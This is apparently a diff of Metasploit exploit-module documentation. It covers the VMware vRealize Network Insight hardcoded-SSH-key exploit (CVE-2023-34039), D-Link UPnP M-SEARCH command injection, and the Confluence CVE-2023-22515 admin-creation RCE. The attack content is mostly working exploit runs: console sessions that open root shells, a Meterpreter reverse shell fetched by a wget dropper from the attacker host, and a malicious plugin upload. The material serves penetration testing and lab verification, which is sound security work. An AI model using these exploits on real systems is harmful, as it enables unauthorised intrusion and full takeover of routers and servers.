[*] Command shell session 5 opened (127.0.0.1:38481 -> 127.0.0.1:22) at 2023-10-16 11:56:30 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform
|
||||
[*] Command shell session 9 opened (127.0.0.1:41659 -> 127.0.0.1:22) at 2023-10-16 11:56:37 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector
|
||||
[*] Command shell session 10 opened (127.0.0.1:37923 -> 127.0.0.1:22) at 2023-10-16 11:56:45 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform
|
||||
[*] Command shell session 11 opened (127.0.0.1:36701 -> 127.0.0.1:22) at 2023-10-16 11:56:53 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector
|
||||
[*] Command shell session 12 opened (127.0.0.1:41667 -> 127.0.0.1:22) at 2023-10-16 11:57:01 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector
|
||||
[*] Command shell session 14 opened (127.0.0.1:33741 -> 127.0.0.1:22) at 2023-10-16 11:57:18 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_platform
|
||||
[*] Command shell session 15 opened (127.0.0.1:37171 -> 127.0.0.1:22) at 2023-10-16 11:57:26 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector
|
||||
[*] Command shell session 16 opened (127.0.0.1:37377 -> 127.0.0.1:22) at 2023-10-16 11:57:34 -0400
|
||||
[*] Command shell session 13 opened (127.0.0.1:39213 -> 127.0.0.1:22) at 2023-10-16 11:57:34 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform
|
||||
[*] Command shell session 17 opened (127.0.0.1:35607 -> 127.0.0.1:22) at 2023-10-16 11:57:42 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector
|
||||
[*] Command shell session 18 opened (127.0.0.1:40607 -> 127.0.0.1:22) at 2023-10-16 11:57:50 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform
|
||||
[*] Command shell session 19 opened (127.0.0.1:33251 -> 127.0.0.1:22) at 2023-10-16 11:57:58 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector
|
||||
[*] Command shell session 20 opened (127.0.0.1:35357 -> 127.0.0.1:22) at 2023-10-16 11:58:06 -0400
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform
|
||||
[+] 127.0.0.1:22 - Successful login via support@127.0.0.1:22 and ssh key /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform
|
||||
[*] Found shell.
|
||||
|
||||
[*] Command shell session 22 opened (127.0.0.1:38695 -> 127.0.0.1:22) at 2023-10-16 11:58:23 -0400
|
||||
[*] Command shell session 21 opened (127.0.0.1:41507 -> 127.0.0.1:22) at 2023-10-16 11:58:39 -0400
|
||||
|
||||
id
|
||||
uid=1001(support) gid=1001(support) groups=1001(support),100(users)
|
||||
```
|
||||
|
||||
### vRealize 6.8.0 Platform
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/ssh/vmware_vrni_known_privkey
|
||||
[*] Using configured payload cmd/unix/interact
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > set stop_on_success false
|
||||
stop_on_success => false
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf6 exploit(linux/ssh/vmware_vrni_known_privkey) > run
|
||||
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform
|
||||
[+] 2.2.2.2:22 - Successful login via support@2.2.2.2:22 and ssh key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform
|
||||
[*] Found shell.
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Attempting key: /root/metasploit-framework/data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform
|
||||
[-] 2.2.2.2:22 SSH - Failed authentication
|
||||
[*] Command shell session 1 opened (1.1.1.1:41377 -> 2.2.2.2:22) at 2023-10-16 14:42:10 -0400
|
||||
|
||||
id
|
||||
uid=1001(support) gid=1001(support) groups=1001(support),27(sudo),1003(vrniusers),1004(fdbusers)
|
||||
cat /etc/os-release
|
||||
NAME="Ubuntu"
|
||||
VERSION="18.04.6 LTS (Bionic Beaver)"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 18.04.6 LTS"
|
||||
VERSION_ID="18.04"
|
||||
HOME_URL="https://www.ubuntu.com/"
|
||||
SUPPORT_URL="https://help.ubuntu.com/"
|
||||
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
|
||||
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
|
||||
VERSION_CODENAME=bionic
|
||||
UBUNTU_CODENAME=bionic
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
@@ -0,0 +1,267 @@
|
||||
## Vulnerable Application
|
||||
This vulnerability is based on an old theme that was discovered in 2013 by `Zach Cutlip` and explained in
|
||||
his blog [The Shadow File](https://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html).
|
||||
It is based on the infamous `UPnP` attack where a command injection vulnerability exists in multiple D-Link network products,
|
||||
allowing an attacker to inject arbitrary command to the `UPnP` via a crafted M-SEARCH packet.
|
||||
Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900 and an attacker can perform
|
||||
a remote command execution by injecting the payload into the `Search Target` (ST) field of the SSDP M-SEARCH discover packet.
|
||||
|
||||
## Installation
|
||||
Ideally, to test this module, you would need a vulnerable D-Link device.
|
||||
However, by downloading the firmware and install and use `FirmAE` to emulate the router,
|
||||
we can simulate the router and test the vulnerable endpoint.
|
||||
|
||||
This module has been tested on:
|
||||
- [ ] FirmAE running on Kali Linux 2023.3
|
||||
* D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
|
||||
* D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
|
||||
* D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
|
||||
* D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
|
||||
* D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
|
||||
* D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
|
||||
* D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
|
||||
* D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
|
||||
* D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
|
||||
* D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
|
||||
* D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
|
||||
* D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older;
|
||||
* D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
|
||||
* D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
|
||||
* D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
|
||||
* D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
|
||||
* D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
|
||||
* D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
|
||||
* D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
|
||||
* D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
|
||||
* D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
|
||||
* D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
|
||||
* D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
|
||||
* D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
|
||||
* probably more looking at the scale of impacted devices :-(
|
||||
|
||||
### Installation steps to emulate the router firmware with FirmAE
|
||||
* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
|
||||
* To emulate the specific firmware that comes with the D-Link devices, `binwalk` might need to be able to handle a sasquatch filesystem.
|
||||
* Follow installation and compilation steps that you can find [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
|
||||
* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
|
||||
* Download the vulnerable firmware from D-Link [here](http://legacyfiles.us.dlink.com/).
|
||||
* Pick `DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP` for the demonstration.
|
||||
* Start emulation.
|
||||
* First run `./init.sh` to initialize and start the Postgress database.
|
||||
* Start a debug session `./run.sh -d d-link /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP`
|
||||
* This will take a while, but in the end you should see the following...
|
||||
|
||||
```shell
|
||||
[*] /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP emulation start!!!
|
||||
[*] extract done!!!
|
||||
[*] get architecture done!!!
|
||||
mke2fs 1.47.0 (5-Feb-2023)
|
||||
e2fsck 1.47.0 (5-Feb-2023)
|
||||
[*] infer network start!!!
|
||||
|
||||
[IID] 25
|
||||
[MODE] debug
|
||||
[+] Network reachable on 192.168.0.1!
|
||||
[+] Web service on 192.168.0.1
|
||||
[+] Run debug!
|
||||
Creating TAP device tap25_0...
|
||||
Set 'tap25_0' persistent and owned by uid 0
|
||||
Initializing VLAN...
|
||||
Bringing up TAP device...
|
||||
Starting emulation of firmware... 192.168.0.1 true true 60.479548271 107.007791943
|
||||
/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
|
||||
import telnetlib
|
||||
[*] firmware - DIR600B6_FW215WWb02
|
||||
[*] IP - 192.168.0.1
|
||||
[*] connecting to netcat (192.168.0.1:31337)
|
||||
[+] netcat connected
|
||||
------------------------------
|
||||
| FirmAE Debugger |
|
||||
------------------------------
|
||||
1. connect to socat
|
||||
2. connect to shell
|
||||
3. tcpdump
|
||||
4. run gdbserver
|
||||
5. file transfer
|
||||
6. exit
|
||||
> 2
|
||||
Trying 192.168.0.1...
|
||||
Connected to 192.168.0.1.
|
||||
Escape character is '^]'.
|
||||
|
||||
/ # uname -a
|
||||
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
|
||||
/ # hostname
|
||||
dlinkrouter
|
||||
/ #
|
||||
```
|
||||
|
||||
* You should now be able to `ping` the network address 192.168.0.1 from your host and
|
||||
* run a `nmap` command to check the services (HTTP TCP port 80 and UPNP UDP port 1900)
|
||||
|
||||
```shell
|
||||
# ping 192.168.0.1
|
||||
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
|
||||
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=8.92 ms
|
||||
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=2.38 ms
|
||||
^C
|
||||
--- 192.168.0.1 ping statistics ---
|
||||
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
|
||||
rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
|
||||
# nmap 192.168.0.1
|
||||
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:33 UTC
|
||||
Nmap scan report for 192.168.0.1
|
||||
Host is up (0.022s latency).
|
||||
Not shown: 995 closed tcp ports (reset)
|
||||
PORT STATE SERVICE
|
||||
53/tcp open domain
|
||||
80/tcp open http
|
||||
443/tcp open https
|
||||
8181/tcp open intermapper
|
||||
49152/tcp open unknown
|
||||
MAC Address: 00:DE:FA:1A:01:00 (Unknown)
|
||||
|
||||
Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
|
||||
# nmap -sU 192.168.0.1
|
||||
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:34 UTC
|
||||
Nmap scan report for 192.168.0.1
|
||||
Host is up (0.0019s latency).
|
||||
Not shown: 993 closed udp ports (port-unreach)
|
||||
PORT STATE SERVICE
|
||||
53/udp open domain
|
||||
67/udp open|filtered dhcps
|
||||
137/udp open|filtered netbios-ns
|
||||
1900/udp open|filtered upnp
|
||||
5353/udp open zeroconf
|
||||
5355/udp open|filtered llmnr
|
||||
19541/udp open|filtered jcp
|
||||
MAC Address: 00:DE:FA:1A:01:00 (Unknown)
|
||||
|
||||
Nmap done: 1 IP address (1 host up) scanned in 1054.98 seconds
|
||||
```
|
||||
You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
|
||||
|
||||
## Verification Steps
|
||||
- [x] Start `msfconsole`
|
||||
- [x] `use exploit/linux/upnp/dlink_upnp_msearch_exec`
|
||||
- [x] `set rhosts <ip-target>`
|
||||
- [x] `set rport 1900`
|
||||
- [x] `set http_port 80`
|
||||
- [x] `set lhost <ip-attacker>`
|
||||
- [x] `set target <0=Unix Command, 1=Linux Dropper>`
|
||||
- [x] `exploit`
|
||||
|
||||
you should get a `shell` or `Meterpreter`
|
||||
|
||||
```shell
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > options
|
||||
|
||||
Module options (exploit/linux/upnp/dlink_upnp_msearch_exec):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 1900 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
HTTP_PORT 80 yes Universal Plug and Play (UPnP) UDP port
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
URN urn:device:1 no Set URN payload
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
|
||||
Payload options (cmd/unix/bind_busybox_telnetd):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LOGIN_CMD /bin/sh yes Command telnetd will execute on connect
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST 192.168.0.1 no The target address
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Unix Command
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
```
|
||||
|
||||
## Options
|
||||
### HTTP_PORT
|
||||
Port setting where the HTTP and SOAP service is running, typically port 80.
|
||||
This is used to discover the d-link hardware and version information by scraping the web or soap response.
|
||||
|
||||
## Scenarios
|
||||
### FirmAE D-Link DIR-865L Router Emulation Unix Command - cmd/unix/bind_busybox_telnetd
|
||||
```shell
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > check
|
||||
|
||||
[*] Checking if 192.168.0.1:1900 can be exploited.
|
||||
[*] 192.168.0.1:1900 - The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
|
||||
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.0.1:1900 can be exploited.
|
||||
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
|
||||
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
|
||||
[*] Started bind TCP handler against 192.168.0.1:4444
|
||||
[*] Command shell session 1 opened (192.168.0.2:42349 -> 192.168.0.1:4444) at 2023-10-17 18:35:36 +0000
|
||||
|
||||
Shell Banner:
|
||||
_!_
|
||||
|
||||
# uname -a
|
||||
uname -a
|
||||
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
|
||||
# hostname
|
||||
hostname
|
||||
dlinkrouter
|
||||
#
|
||||
```
|
||||
### FirmAE D-Link DIR-865L Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
|
||||
```shell
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set payload linux/mipsle/meterpreter_reverse_tcp
|
||||
payload => linux/mipsle/meterpreter_reverse_tcp
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set lhost 192.168.0.2
|
||||
lhost => 192.168.0.2
|
||||
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.0.2:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.0.1:1900 can be exploited.
|
||||
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
|
||||
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
|
||||
[*] Using URL: http://192.168.0.2:8080/5W7O47FX
|
||||
[*] Command Stager progress - 100.00% done (112/112 bytes)
|
||||
[*] Client 192.168.0.1 (Wget) requested /5W7O47FX
|
||||
[*] Sending payload to 192.168.0.1 (Wget)
|
||||
[*] Meterpreter session 2 opened (192.168.0.2:4444 -> 192.168.0.1:59600) at 2023-10-17 18:45:12 +0000
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.0.1
|
||||
OS : (Linux 4.1.17+)
|
||||
Architecture : mips
|
||||
BuildTuple : mipsel-linux-muslsf
|
||||
Meterpreter : mipsle/linux
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter >
|
||||
```
|
||||
## Limitations
|
||||
Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.
|
||||
Some D-Link devices do not have the `wget` command so configure `echo` as cmd-stager flavor with the command `set CMDSTAGER::FLAVOR echo`.
|
||||
@@ -0,0 +1,112 @@
|
||||
## Vulnerable Application
|
||||
This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP
|
||||
parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for
|
||||
Java objects to be modified at run time. The exploit will create a new administrator user and upload a
|
||||
malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,
|
||||
8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.
|
||||
|
||||
For a full technical analysis of the vulnerability read the
|
||||
[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis).
|
||||
|
||||
## Testing
|
||||
Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.).
|
||||
By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence
|
||||
8.5.1 running on Windows Server 2022.
|
||||
|
||||
## Verification Steps
|
||||
Note: Disable Defender if you are using the default payloads.
|
||||
|
||||
Steps:
|
||||
1. Start msfconsole
|
||||
2. `use exploit/multi/http/atlassian_confluence_rce_cve_2023_22515`
|
||||
3. `set RHOST 192.168.86.50`
|
||||
4. `check`
|
||||
5. `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
|
||||
The base path for the target servers Confluence installation. By default this option is set to `/`.
|
||||
|
||||
### CONFLUENCE_TARGET_ENDPOINT
|
||||
|
||||
This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST
|
||||
request. Any Confluence Action endpoint that extends the base class `ConfluenceActionSupport` is likely to work. Two
|
||||
example endpoints that have been tested are `server-info.action` and `ajax/spaceavailable.action`. By default this
|
||||
option is set to `server-info.action`.
|
||||
|
||||
### CONFLUENCE_PLUGIN_TIMEOUT
|
||||
|
||||
The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously
|
||||
and we must poll the server to find out when installation has completed. This option governs the maximum amount
|
||||
of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Automatic
|
||||
```
|
||||
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > show options
|
||||
|
||||
Module options (exploit/multi/http/atlassian_confluence_rce_cve_2023_22515):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout to wait when installing a plugin
|
||||
CONFLUENCE_TARGET_ENDPOINT server-info.action yes The endpoint used to trigger the vulnerability.
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
|
||||
ploit.html
|
||||
RPORT 8090 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes Base path for Confluence
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (java/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > check
|
||||
[*] 192.168.86.50:8090 - The target appears to be vulnerable. Atlassian Confluence 8.5.1
|
||||
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Atlassian Confluence 8.5.1
|
||||
[*] Setting the application configuration's setupComplete to false via endpoint: /server-info.action
|
||||
[*] Creating a new administrator user account...
|
||||
[*] Created zskghlfv:NDqbcj4N
|
||||
[*] Adding a malicious plugin...
|
||||
[*] Waiting for plugin to be installed...
|
||||
[*] Triggering payload...
|
||||
[*] Deleting plugin...
|
||||
